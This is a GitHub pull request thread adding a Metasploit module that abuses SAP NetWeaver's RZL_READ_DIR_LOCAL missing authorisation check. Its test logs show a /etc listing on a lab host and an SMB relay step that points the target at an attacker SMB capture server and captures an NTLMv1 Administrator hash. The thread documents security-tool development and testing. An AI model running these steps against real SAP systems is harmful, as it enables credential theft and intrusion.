RZL_READ_DIR_LOCAL (directory listing and SMB relay) #1657

Merged
merged 1 commit into from May 2, 2013

2 participants

@nmonkee

This module exploits the SAP NetWeaver RZL_READ_DIR_LOCAL Missing Authorisation Check And SMB Relay Vulnerability. RZL_READ_DIR_LOCAL returns the file names in a given directory. It returns only the first 32 characters of a filename (truncated).

SAP Note 1595074 / DSECRG-12-026.

http://erpscan.com/advisories/dsecrg-12-026-sap-netweaver-rzl_read_dir_local-missing-authorization-check-and-smb-relay-vulnerability

@jvazquez-r7 jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework May 2, 2013
Merged

Cleanup for sap_soap_rfc_rzl_read_dir_local_dir_listing_and_smb_relay #5

@jvazquez-r7

Hi @nmonkee,

In nmonkee#5 I'm trying to cleanup sap_soap_rfc_rzl_read_dir_local_dir_listing_and_smb_relay.rb. Please feel free to review, discuss, test, etc any of the changes proposed. Once you feel comfortable just land the pull request in your repository and this one will be automatically updated. And we'll be ready to merge it.

Also, you might want to check our docs on landing pull requests, https://github.com/rapid7/metasploit-framework/wiki/Landing-Pull-Requests , and would be nice if you have into account the benefits of clean, short, informative merge commit messages: git merge --no-ff --edit and sticking to the usual 50/72 formatting for commits makes for pleasantly readable logs.

Don't hesitate to ask any doubts and, also, if while we work in this modules you feel comfortable enough and have the time to incorporate these recommendations to the existing sap pull requests would accelerate things for sure :-) Anyway will keep helping with these pull requests!

Summary of Changes:

  • Keep modules filenames shorter.
  • Run tools/msftidy.rb, modules must be compliant.
  • Use the guidelines proposed on https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient when using HTTPClient.
  • Since it's an Scanner module, in order to avoid verbosity, try to use print only for the minor information possible (normally success). For the others prints use the verbose print => vprint_*
  • Please add the name of the vulnerability discoverer to the Authors section when available, helps to document modules.
  • Please add known references such as OSVDB, BID or CVE to the References section when available, helps to document modules.
  • When there are required options always make things easier to provide a default option if possible.
  • Parsing profitable information, in this case the dir enumeration from the xml response helps to present better the results. Even when storing the loot is a good thing to store the full response. Even when int his Scanner module the parsed results are only showed to the user when mode VERBOSE = true.

Thanks!

@jvazquez-r7

Testing result after code cleanup:

  • No verbose mode
msf auxiliary(sap_soap_rfc_rzl_read_dir_local_dir_listing_and_smb_relay) > run

[*] 192.168.172.179:8042 - Sending request to enumerate /etc
[+] 192.168.172.179:8042 - /etc successfully enumerated, results stored on /Users/juan/.msf4/loot/20130501213219_default_192.168.172.179_sap.soap.rfc.dir_782389.bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

  • Verbose mode
msf auxiliary(sap_soap_rfc_rzl_read_dir_local_dir_listing_and_smb_relay) > run

[*] 192.168.172.179:8042 - Sending request to enumerate /etc
[+] 192.168.172.179:8042 - /etc successfully enumerated, results stored on /Users/juan/.msf4/loot/20130501213427_default_192.168.172.179_sap.soap.rfc.dir_499762.bin
Entry: , Size: 0
Entry: ., Size: 12288
Entry: .., Size: 4096
Entry: apache2, Size: 4096
Entry: rpc, Size: 1615
Entry: netconfig.d, Size: 4096
Entry: gssapi_mech.conf, Size: 842
Entry: gtk-2.0, Size: 4096
Entry: idmapd.conf, Size: 144
Entry: permissions.local, Size: 1353
Entry: slsh.rc, Size: 1377
Entry: a2ps.cfg, Size: 15161
Entry: permissions.d, Size: 4096
Entry: passwd, Size: 1669
Entry: rwtab, Size: 858
Entry: powerd.conf, Size: 112
Entry: pango, Size: 4096
Entry: sgml, Size: 4096
Entry: mail.rc, Size: 112
Entry: sysctl.conf~, Size: 501
Entry: auto.net, Size: 1237
Entry: passwd.old, Size: 1622
Entry: manpath.config, Size: 11523
Entry: opensc.conf, Size: 10468
Entry: suseRegister.conf, Size: 456
Entry: generateCRL.conf, Size: 448
Entry: xml, Size: 4096
Entry: aliases, Size: 2579
Entry: ethers, Size: 605
Entry: filesystems, Size: 26
Entry: logrotate.d, Size: 4096
Entry: gre.d, Size: 4096
Entry: xscreensaver, Size: 12288
Entry: pwdutils, Size: 4096
Entry: jvm, Size: 4096
Entry: gnupg, Size: 4096
Entry: modprobe.d, Size: 4096
Entry: mime.types, Size: 12954
Entry: SuSE-brand, Size: 43
Entry: ld.so.cache, Size: 58637
Entry: raw, Size: 222
Entry: krb5.conf, Size: 297
Entry: gai.conf, Size: 2689
Entry: syslog-ng, Size: 4096
Entry: cups, Size: 4096
Entry: magic, Size: 113
Entry: init.d, Size: 4096
Entry: hosts.deny, Size: 149
Entry: sensors3.conf, Size: 71262
Entry: resolv.conf, Size: 847
Entry: fstab, Size: 528
Entry: gnome-vfs-2.0, Size: 4096
Entry: netconfig, Size: 767
Entry: pythonstart, Size: 736
Entry: yastws, Size: 4096
Entry: idn.conf, Size: 1810
Entry: rsyncd.conf, Size: 322
Entry: security, Size: 4096
Entry: iscsid.conf, Size: 10957
Entry: xinetd.conf, Size: 623
Entry: lsb-release.d, Size: 4096
Entry: gnome_defaults.conf, Size: 2431
Entry: defkeymap.name, Size: 45
Entry: sound, Size: 4096
Entry: rpm, Size: 4096
Entry: rc.status, Size: 10263
Entry: termcap, Size: 969976
Entry: protocols, Size: 23232
Entry: cron.d, Size: 4096
Entry: modprobe.conf, Size: 10374
Entry: wgetrc, Size: 4306
Entry: smsetup.conf, Size: 1542
Entry: sensors.conf, Size: 85179
Entry: aliases.db, Size: 12288
Entry: susehelp.d, Size: 4096
Entry: csh.login, Size: 7486
Entry: slp.conf, Size: 9800
Entry: motd, Size: 0
Entry: alternatives, Size: 4096
Entry: ImagePackages, Size: 74735
Entry: lighttpd, Size: 4096
Entry: at.deny, Size: 144
Entry: ImageVersion, Size: 32
Entry: permissions, Size: 9643
Entry: networks, Size: 225
Entry: fonts, Size: 4096
Entry: lesskey, Size: 899
Entry: crontab, Size: 255
Entry: HOSTNAME, Size: 22
Entry: hal, Size: 4096
Entry: hushlogins, Size: 1
Entry: auto.misc, Size: 524
Entry: auto.master, Size: 660
Entry: acpi, Size: 4096
Entry: autofs_ldap_auth.conf, Size: 232
Entry: collectd.conf, Size: 15974
Entry: pam.d, Size: 4096
Entry: hosts.equiv, Size: 188
Entry: sysstat, Size: 4096
Entry: bindresvport.blacklist, Size: 415
Entry: ssh, Size: 4096
Entry: bonobo-activation, Size: 4096
Entry: ldap.conf, Size: 9574
Entry: sfcb, Size: 4096
Entry: postfix, Size: 4096
Entry: default, Size: 4096
Entry: exports, Size: 322
Entry: ntp.keys, Size: 12
Entry: iscsi, Size: 4096
Entry: hosts, Size: 827
Entry: ld.so.conf.d, Size: 4096
Entry: SuSEconfig, Size: 4096
Entry: a2ps-site.cfg, Size: 2565
Entry: libaudit.conf, Size: 191
Entry: profile.d, Size: 4096
Entry: shadow.old, Size: 930
Entry: webyast, Size: 4096
Entry: insserv.conf, Size: 764
Entry: bash_completion.d, Size: 4096
Entry: openwsman, Size: 4096
Entry: news, Size: 4096
Entry: dbus-1, Size: 4096
Entry: apparmor.d, Size: 4096
Entry: X11, Size: 4096
Entry: mailcap, Size: 4797
Entry: ppp, Size: 4096
Entry: localtime, Size: 3661
Entry: gdm, Size: 4096
Entry: rsyncd.secrets, Size: 14
Entry: defkeymap.map, Size: 30816
Entry: sasl2, Size: 4096
Entry: profile, Size: 9801
Entry: ntp.conf, Size: 2028
Entry: resolv.conf.netconfig, Size: 846
Entry: depmod.d, Size: 4096
Entry: depmod.conf, Size: 416
Entry: group.old, Size: 682
Entry: foomatic, Size: 4096
Entry: rpasswd.conf, Size: 94
Entry: hosts.lpd, Size: 191
Entry: hosts.allow, Size: 2639
Entry: yast_user_roles, Size: 326
Entry: gpm, Size: 4096
Entry: named.d, Size: 4096
Entry: cron.hourly, Size: 4096
Entry: slp.reg.d, Size: 4096
Entry: libvirt, Size: 4096
Entry: aclocal_dirlist, Size: 25
Entry: pm, Size: 4096
Entry: ssl, Size: 4096
Entry: auto.smb, Size: 687
Entry: modprobe.conf.local, Size: 47
Entry: DIR_COLORS, Size: 2863
Entry: cron.weekly, Size: 4096
Entry: PackageKit, Size: 4096
Entry: services.testdrive, Size: 765073
Entry: ConsoleKit, Size: 4096
Entry: slp.spi, Size: 2707
Entry: opt, Size: 4096
Entry: securetty, Size: 161
Entry: sysconfig, Size: 4096
Entry: request-key.conf, Size: 1586
Entry: omc, Size: 4096
Entry: udev, Size: 4096
Entry: sysctl.conf, Size: 755
Entry: reader.conf.d, Size: 4096
Entry: ld.so.conf, Size: 262
Entry: shells, Size: 179
Entry: gnome-vfs-mime-magic, Size: 10793
Entry: openldap, Size: 4096
Entry: login.defs, Size: 4749
Entry: grub.conf, Size: 57
Entry: jvm-commmon, Size: 4096
Entry: rc.splash, Size: 2700
Entry: maven, Size: 4096
Entry: group, Size: 689
Entry: blkid.conf, Size: 135
Entry: yp.conf, Size: 779
Entry: pulse, Size: 4096
Entry: samba, Size: 4096
Entry: netgroup, Size: 796
Entry: NetworkManager, Size: 4096
Entry: apparmor, Size: 4096
Entry: lvm, Size: 4096
Entry: aliases.d, Size: 4096
Entry: scsi_id.config, Size: 666
Entry: uucp, Size: 4096
Entry: rc.d.README, Size: 614
Entry: xinetd.d, Size: 4096
Entry: issue.net, Size: 75
Entry: pnm2ppa.conf, Size: 7636
Entry: modprobe.conf.YaST2save, Size: 10373
Entry: inittab, Size: 2981
Entry: services, Size: 765091
Entry: bootsplash, Size: 4096
Entry: drirc, Size: 645
Entry: Muttrc, Size: 117386
Entry: xattr.conf, Size: 654
Entry: autoinstall, Size: 4096
Entry: SuSE-release, Size: 69
Entry: vimrc, Size: 5819
Entry: xdg, Size: 4096
Entry: idnalias.conf, Size: 207
Entry: .pwd.lock, Size: 0
Entry: environment, Size: 97
Entry: YaST2, Size: 4096
Entry: zypp, Size: 4096
Entry: printcap, Size: 135
Entry: logrotate.conf, Size: 897
Entry: lesskey.bin, Size: 405
Entry: mke2fs.conf, Size: 803
Entry: iproute2, Size: 4096
Entry: lsb-release, Size: 110
Entry: nsswitch.conf, Size: 1192
Entry: bash.bashrc, Size: 8727
Entry: permissions.paranoid, Size: 22290
Entry: resolv.conf~, Size: 846
Entry: skel, Size: 4096
Entry: rwtab.d, Size: 4096
Entry: cups-autoconfig.conf, Size: 79
Entry: products.d, Size: 4096
Entry: issue, Size: 78
Entry: cron.deny, Size: 11
Entry: ghostscript, Size: 4096
Entry: sysctl.backup, Size: 677
Entry: java, Size: 4096
Entry: dnsmasq.conf, Size: 18485
Entry: hp, Size: 4096
Entry: shadow, Size: 963
Entry: permissions.easy, Size: 21052
Entry: host.conf, Size: 370
Entry: mtab, Size: 723
Entry: cron.monthly, Size: 4096
Entry: defaultdomain, Size: 0
Entry: gconf, Size: 4096
Entry: PolicyKit, Size: 4096
Entry: ttytype, Size: 258
Entry: cron.daily, Size: 4096
Entry: icewm, Size: 4096
Entry: inputrc, Size: 13516
Entry: csh.cshrc, Size: 5322
Entry: papersize, Size: 3
Entry: hosts.YaST2save, Size: 775
Entry: rc.d, Size: 4096
Entry: ftpusers, Size: 565
Entry: permissions.secure, Size: 23966
Entry: mtools.conf, Size: 1447
[*] Scanned 1 of 1 hosts (100% complete)

@nmonkee

msf > use auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir
msf auxiliary(sap_soap_rfc_rzl_read_dir) > set RHOSTS 10.0.7.50
RHOSTS => 10.0.7.50
msf auxiliary(sap_soap_rfc_rzl_read_dir) > set RPORT 8042
RPORT => 8042
msf auxiliary(sap_soap_rfc_rzl_read_dir) > run

[+] 10.0.7.50:8042 - /etc successfully enumerated, results stored on /Users/nmonkee/.msf4/loot/20130502094348_default_10.0.7.50_sap.soap.rfc.dir_288313.bin
[] Scanned 1 of 1 hosts (100% complete)
[
] Auxiliary module execution completed

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set SRVHOST 10.0.7.13
SRVHOST => 10.0.7.13
msf auxiliary(smb) > run -j
[] Auxiliary module running as background job
[
] Server started.

msf auxiliary(smb) > use auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir
msf auxiliary(sap_soap_rfc_rzl_read_dir) > set RHOSTS 10.0.7.8
RHOSTS => 10.0.7.8
msf auxiliary(sap_soap_rfc_rzl_read_dir) > set RPORT 8000
RPORT => 8000

msf auxiliary(sap_soap_rfc_rzl_read_dir) > set DIR C:\\
DIR => C:\
msf auxiliary(sap_soap_rfc_rzl_read_dir) > run

[+] 10.0.7.8:8000 - C:\ successfully enumerated, results stored on /Users/nmonkee/.msf4/loot/20130502104221_default_10.0.7.8_sap.soap.rfc.dir_153972.bin
[] Scanned 1 of 1 hosts (100% complete)
[
] Auxiliary module execution completed

msf auxiliary(sap_soap_rfc_rzl_read_dir) > set DIR \\10.0.7.13\share
DIR => \10.0.7.13\share
msf auxiliary(sap_soap_rfc_rzl_read_dir) > run

[*] SMB Captured - 2013-05-02 10:43:00 +0100
NTLMv1 Response Captured from 10.0.7.8:49497 - 10.0.7.8
USER:Administrator DOMAIN:GATEWAY OS: LM:
LMHASH:Disabled
NTHASH:d9d3c192407bc93152376e16d6a3a3fa9aa53b3cf940f8d4

[] Scanned 1 of 1 hosts (100% complete)
[
] Auxiliary module execution completed

@nmonkee nmonkee Merge pull request #5 from jvazquez-r7/sap_soap_rfc_rzl_read_dir_loca…
…l_dir_cleanup

Cleanup for sap_soap_rfc_rzl_read_dir_local_dir_listing_and_smb_relay
8e9789b
@jvazquez-r7

Merging!

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request May 2, 2013
jvazquez-r7 Land #1657, @nmonkee's RZL_READ_DIR_LOCAL SAP dir listing module 4054d91
@jvazquez-r7 jvazquez-r7 merged commit 8e9789b into rapid7:master May 2, 2013

1 check passed

Details default The Travis build passed
@nmonkee nmonkee deleted the nmonkee:sap_soap_rfc_rzl_read_dir_local_dir_listing_and_smb_relay_ branch May 9, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment